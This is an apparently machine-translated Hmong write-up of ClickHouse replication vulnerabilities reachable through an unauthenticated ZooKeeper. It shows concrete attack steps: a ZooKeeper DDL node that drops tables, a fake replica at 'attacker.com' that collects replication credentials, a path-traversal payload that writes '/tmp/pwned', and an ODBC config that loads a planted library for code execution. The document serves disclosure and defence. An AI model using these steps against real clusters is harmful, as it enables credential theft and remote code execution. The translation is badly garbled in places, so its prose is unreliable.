Vim li cas koj thiaj li yuav tsum kaw lub tsev zoo?

Tsab ntawv xov xwm no yuav qhia zaj dab neeg ntawm qhov muaj qhov tsis zoo tshwj xeeb hauv ClickHouse replication raws tu qauv, thiab tseem yuav qhia seb qhov kev tawm tsam tuaj yeem nthuav dav li cas.

ClickHouse yog lub chaw khaws ntaub ntawv khaws cia cov ntaub ntawv loj, feem ntau siv ntau dua ib qho kev hloov pauv. Clustering thiab replication hauv ClickHouse yog ua rau saum Apache ZooKeeper (ZK) thiab xav tau txoj cai sau ntawv.

Lub neej ntawd ZK kev teeb tsa tsis tas yuav muaj kev lees paub, yog li ntau txhiab tus ZK servers siv los teeb tsa Kafka, Hadoop, ClickHouse muaj rau pej xeem.

Txhawm rau txo koj qhov chaw tawm tsam, koj yuav tsum tau teeb tsa kev lees paub thiab tso cai thaum txhim kho ZooKeeper

Muaj qhov tseeb qee qhov 0day raws li Java deserializations, tab sis xav txog tias tus neeg tawm tsam tuaj yeem nyeem thiab sau ntawv rau ZooKeeper, siv rau ClickHouse replication.

Thaum teeb tsa hauv hom pawg, ClickHouse txhawb nqa cov lus nug DDL, hla dhau ZK - rau lawv cov nodes yog tsim nyob rau hauv daim ntawv /clickhouse/task_queue/ddl.

Piv txwv li, koj tsim cov node /clickhouse/task_queue/ddl/query-0001 nrog cov ntsiab lus:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

thiab tom qab ntawd, cov lus xeem yuav raug muab tshem tawm ntawm pawg servers host1 thiab host2. DDL kuj txhawb kev khiav CREATE/ALTER/DROP queries.

Suab txaus ntshai? Tab sis qhov twg tus neeg tawm tsam tuaj yeem tau txais chaw nyob server?

ClickHouse replication ua hauj lwm nyob rau theem ntawm ib tug neeg lub rooj, yog li ntawd thaum lub rooj yog tsim nyob rau hauv ZK, ib tug neeg rau zaub mov tau teev tseg uas yuav muaj lub luag hauj lwm rau kev sib pauv metadata nrog replicas. Piv txwv li, thaum ua qhov kev thov (ZK yuav tsum tau teeb tsa, chXX - lub npe ntawm lub replica, foob - lub npe rooj):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

nodes yuav raug tsim kab и metadata.

Cov ntsiab lus /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Puas muaj peev xwm ua ke cov ntaub ntawv los ntawm pawg no? Yog, yog tias qhov chaw nres nkoj replication (TCP/9009) ntawm server chXX-address firewall yuav tsis raug kaw thiab authentication rau replication yuav tsis configured. Yuav ua li cas bypass authentication?

Tus neeg tawm tsam tuaj yeem tsim cov qauv tshiab hauv ZK los ntawm tsuas yog luam cov ntsiab lus los ntawm /clickhouse/tables/01-01/foobar/replicas/chXX thiab hloov lub ntsiab lus host.

Cov ntsiab lus /clickhouse/tables/01–01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Tom qab ntawd koj yuav tsum qhia rau lwm tus replicas tias muaj cov ntaub ntawv tshiab ntawm tus neeg tua neeg tus neeg rau zaub mov uas lawv yuav tsum tau coj - lub node yog tsim hauv ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX monotonically loj hlob txee, uas yuav tsum muaj ntau dua qhov kawg ntawm qhov kev tshwm sim:

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

qhov twg qhov chaw_replica - lub npe ntawm tus neeg tawm tsam tus qauv tsim hauv cov kauj ruam dhau los, block_id - cov ntaub ntawv thaiv tus cim, tau - "tau block" hais kom ua (thiab ntawm no yog cov lus txib rau lwm cov haujlwm).

Tom ntej no, txhua tus replica nyeem qhov xwm txheej tshiab hauv lub cav thiab mus rau lub server tswj los ntawm tus neeg tawm tsam kom tau txais cov ntaub ntawv thaiv (cov txheej txheem rov ua dua yog binary, khiav saum HTTP). Server attacker.com yuav tau txais kev thov:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

qhov twg XXX yog cov ntaub ntawv pov thawj rau kev rov ua dua. Qee zaum, qhov no yuav yog ib tus account nrog kev nkag mus rau cov ntaub ntawv ntawm lub ntsiab ClickHouse raws tu qauv thiab HTTP raws tu qauv. Raws li koj tau pom, qhov chaw tawm tsam tau dhau los ua qhov loj heev vim ZooKeeper, siv rau kev rov ua dua, tau tso tseg yam tsis muaj pov thawj pom tseeb.

Cia peb saib ntawm kev ua haujlwm ntawm kev tau txais ib qho thaiv ntawm cov ntaub ntawv los ntawm ib qho kev hloov pauv, nws tau sau nrog kev ntseeg siab tag nrho tias txhua qhov replicas yog nyob rau hauv kev tswj kom raug thiab muaj kev ntseeg siab ntawm lawv.

replication processing code

Cov haujlwm nyeem cov npe ntawm cov ntaub ntawv, tom qab ntawd lawv cov npe, qhov ntau thiab tsawg, cov ntsiab lus, thiab tom qab ntawd sau lawv mus rau cov ntaub ntawv kaw lus. Nws tsim nyog cais piav qhia txog yuav ua li cas cov ntaub ntawv khaws cia hauv cov ntaub ntawv kaw lus.

Muaj ob peb subdirectories nyob rau hauv /var/lib/clickhouse (default storage directory from the configuration file):

chij - directory rau kaw chij, siv nyob rau hauv rov qab tom qab cov ntaub ntawv poob;
tmp ua - cov ntaub ntawv khaws cia cov ntaub ntawv ib ntus;
user_files - Kev ua haujlwm nrog cov ntaub ntawv hauv kev thov tsuas yog txwv rau daim ntawv teev npe no (INTO OUTFILE thiab lwm yam);
metadata - sql cov ntaub ntawv nrog cov lus piav qhia;
preprocessed_config - txheej txheem derivative configuration ntaub ntawv los ntawm /etc/clickhouse-server;
cov ntaub ntawv - daim ntawv teev npe tiag tiag nrog cov ntaub ntawv nws tus kheej, hauv qhov no rau txhua qhov chaw khaws ntaub ntawv cais subdirectory tsuas yog tsim ntawm no (piv txwv li /var/lib/clickhouse/data/default).

Rau txhua lub rooj, ib subdirectory yog tsim nyob rau hauv lub database directory. Txhua kem yog ib cov ntaub ntawv cais nyob ntawm cav hom. Piv txwv li rau lub rooj foobtsim los ntawm tus neeg tawm tsam, cov ntaub ntawv hauv qab no yuav raug tsim:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

Lub replica cia siab tias yuav tau txais cov ntaub ntawv nrog tib lub npe thaum ua cov ntaub ntawv thaiv thiab tsis siv lawv li txhua txoj hauv kev.

Tus neeg nyeem nyeem tau tej zaum twb tau hnov ​​​​txog qhov kev sib txuas tsis zoo ntawm file_name hauv kev ua haujlwm WriteBufferFromFile. Yog lawm, qhov no tso cai rau tus neeg tawm tsam sau cov ntsiab lus tsis txaus ntseeg rau txhua cov ntaub ntawv ntawm FS nrog rau cov neeg siv txoj cai clickhouse. Txhawm rau ua qhov no, tus qauv tswj hwm los ntawm tus neeg tawm tsam yuav tsum rov qab cov lus teb hauv qab no rau qhov kev thov (kab tawg tau ntxiv rau kev nkag siab yooj yim):

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

thiab tom qab concatenation ../../../../../../../../../tmp/pwned cov ntaub ntawv yuav raug sau /tmp/pwned nrog cov ntsiab lus hellofromzookeeper.

Muaj ntau txoj hauv kev los hloov cov ntaub ntawv muaj peev xwm sau rau hauv tej thaj chaw deb code execution (RCE).

Cov phau ntawv txhais lus sab nraud hauv RCE

Hauv cov ntawv qub, cov npe nrog ClickHouse nqis tau khaws cia nrog cov neeg siv txoj cai clickhouse ua ntej. Cov ntaub ntawv chaw yog cov ntaub ntawv XML uas cov kev pabcuam nyeem thaum pib thiab tom qab ntawd caches hauv /var/lib/clickhouse/preprocessed_configs. Thaum hloov pauv, lawv rov nyeem dua. Yog tias koj muaj kev nkag mus rau /etc/clickhouse-server tus neeg tawm tsam tuaj yeem tsim nws tus kheej phau ntawv txhais lus sab nraud executable hom thiab ces execute arbitrary code. Tam sim no versions ntawm ClickHouse tsis muab txoj cai los ntawm lub neej ntawd, tab sis yog tias tus neeg rau zaub mov tau maj mam hloov kho, cov cai no tuaj yeem nyob twj ywm. Yog tias koj txhawb nqa ClickHouse pawg, tshawb xyuas cov cai rau cov npe teev npe, nws yuav tsum yog tus neeg siv root.

ODBC to CSY

Thaum txhim kho ib pob, tus neeg siv tau tsim clickhouse, tab sis nws lub tsev directory tsis yog tsim /nonexistent. Txawm li cas los xij, thaum siv cov phau ntawv txhais lus sab nraud, lossis rau lwm yam laj thawj, cov thawj coj tsim cov npe /nonexistent thiab muab rau tus neeg siv clickhouse nkag mus sau rau nws (SSZB! kwv yees. tus txhais lus).

ClickHouse txhawb nqa ODBC thiab tuaj yeem txuas rau lwm cov ntaub ntawv. Hauv ODBC, koj tuaj yeem qhia txoj hauv kev mus rau lub tsev qiv ntawv tsav tsheb database (.so). Cov ntawv qub ntawm ClickHouse tso cai rau koj ua qhov no ncaj qha hauv tus neeg thov kev thov, tab sis tam sim no kev kuaj xyuas nruj dua ntawm txoj hlua txuas tau ntxiv rau. odbc-bridge, yog li nws tsis tuaj yeem hais qhia txoj kev tsav tsheb los ntawm kev thov. Tab sis tus neeg tawm tsam puas tuaj yeem sau rau hauv phau ntawv teev npe hauv tsev siv qhov tsis zoo uas tau piav qhia saum toj no?

Wb tsim ib cov ntaub ntawv ~/.odbc.ini nrog cov ntsiab lus zoo li no:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

ces thaum pib SELECT * FROM odbc('DSN=lalala', 'test', 'test'); lub tsev qiv ntawv yuav loaded test.so thiab tau txais RCE (ua tsaug buglloc ua rau lub tswv yim).

Cov no thiab lwm qhov tsis zoo tau raug kho hauv ClickHouse version 19.14.3. Saib xyuas koj ClickHouse thiab ZooKeepers!

Tau qhov twg los: www.hab.com